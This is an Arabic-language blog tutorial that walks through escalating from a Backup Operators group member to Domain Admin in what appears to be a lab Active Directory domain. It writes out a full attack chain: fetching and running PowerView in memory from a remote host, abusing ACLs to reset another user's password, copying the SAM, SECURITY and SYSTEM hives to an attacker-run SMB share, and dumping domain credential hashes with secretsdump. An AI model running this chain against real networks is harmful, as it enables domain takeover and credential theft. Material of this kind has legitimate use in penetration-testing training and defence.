Backup Operators Group To Domain Admin

Jehad Alqurashiمنذ سنة

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

مقدمة:

ماهو قروب الـBackup Operator ؟

طبعا في البداية هذا القروب يتم انشاءة تلقائيا عند تنصيب بيئة الـActive Directory ويحتوي على ميزات تفيد المخترق في الوصول الى الـDomain Controller

الميزات اللي يحتويها هذا القروب هو انه يسمح له انه يسوي Backup الى اي ملف بغض النظر عن صلاحية الملف سواء كان قابل للقراءة او لا ف نحن تهمنا ثلاث ملفات واللي هي SAM ,SECURITY,SYSTEM



طبعا في هذي المقالة راح نتبع سيناريو معين ماراح فقط انفذ لكم التكنيك وننهي المقالة
 

الشرح:

 

اولا انا ماخذ جلسة Reverse Shell على المستخدم jehad
 

الان خلونا نشوف ايش الـACLS او الامكانيات اللي المستخدم jehad يقوم فيها

طبعا كل شي راح نسوي Load لي اداة powerview في الميموري عن طريق هذا الامر:
 

iex(iwr http://192.168.100.112/powerview.ps1 -usebasicparsing)

 الان راح ننفذ هذا الامر عشان نشوف من هم المستخدمين المتواجدين في قروب الـ Backup Operators

 

Get-DomainGroupMember -identity "Backup Operators"

نلاحظ مع بعض ان المستخدم muhammed موجود ضمن قروب Backup Operator 

الان خلونا نحاول نشوف هل المستخدم jehad عنده صلاحية على المستخدم muhammed مثلا انه يمكنه تغيير الباسورد او غيره

راح ننفذ هذا الامر عشان نشوف الصلاحيات المكتسبة لكل مستخدم:
 

Find-InterestingDomainAcl

نلاحظ مع بعض في الصورة السابقة انه المستخدم  jehad عنده صلاحيات Extended Right على المستخدم muhammed ف هذا يعني انه ممكن نقوم بتغيير الباسورد الخاص في المستخدم muhammed

لو انت مو فاهم الـACLS زين عليك بالمقالة هذي Abusing Active Directory ACLs/ACEs


الان راح ننفذ هذا الامر عشان نغير الباسورد الخاص في المستخدم muhammed :
 

$SecureString = ConvertTo-SecureString -String "Tester12345#!!" -AsPlainText -Force

Set-DomainUserPassword -identity muhammed -AccountPassword $SecureString -domain vulnerable.com

الان بعد تغيير الباسورد الخاص في المستخدم muhammed اللي هو ضمن قروب الـBackup Operators راح نستخدم هذا السكربت BackupOperatorToDA

 

قبل استخدام الاداة افتح لك smb server عشان راح ننقل عليه ملفات الـSAM و الـSECURITY و الـSYSTEM


امر فتح smb server:
 

python /usr/share/doc/python3-impacket/examples/smbserver.py jehad . -smb2support

 

 متطلبات الاداة موضحة في الصورة السابقة


t- اسم جهاز الـDomain Controller
o- الباث الخاص في الـsmb server اللي تم تشغيله مسبقا
u- اسم المستخدم اللي متواجد في قروب الـBackup Operators واللي هو muhammed
p- الباسورد الخاص في المستخدم muhammed
d- اسم النطاق واللي هو vulnerable.com

ف الامر النهائي راح يكون كذا:
 

.\BackUp.exe -t \\dc.vulnerable.com -o \\192.168.100.112\jehad\ -u muhammed -p Tester12345#!! -d vulnerable.com

 الان تم نقل الثلاث الملفات المهمة واللي راح تفيدنا في استخراج NTLMv1 الخاص في الـDomain Controller

طبعا عشان نستخرجها الان راح نستخدم اداة secretdump عن طريق هذا الامر:

 

/usr/bin/impacket-secretsdump LOCAL -sam SAM -system SYSTEM -security SECURITY

 الان تم استخراج NTLM هاش الخاص بالـDomain Controller

الان راح نعطي NT هاش لي اداة secretsdump مع اسم الـDomain Controller عشان تستخرج لنا جميع المستخدمين المتواجدين في بيئة الـActive Directory مع الهاش الخاص فيهم عن طريق ملف NTds


الامر:
 

/usr/bin/impacket-secretsdump VULNERABLE.COM/'dc$'@dc.vulnerable.com -hashes ':1836d9e3263fb4973cff3bed243849be'

وصلنا لنهاية المقالة


شاكر لكم .

كلمات دليلية: hacking
1
إعجاب
910
مشاهدات
0
مشاركة
2
متابع

التعليقات (0)

لايوجد لديك حساب في عالم البرمجة؟

تحب تنضم لعالم البرمجة؟ وتنشئ عالمك الخاص، تنشر المقالات، الدورات، تشارك المبرمجين وتساعد الآخرين، اشترك الآن بخطوات يسيرة !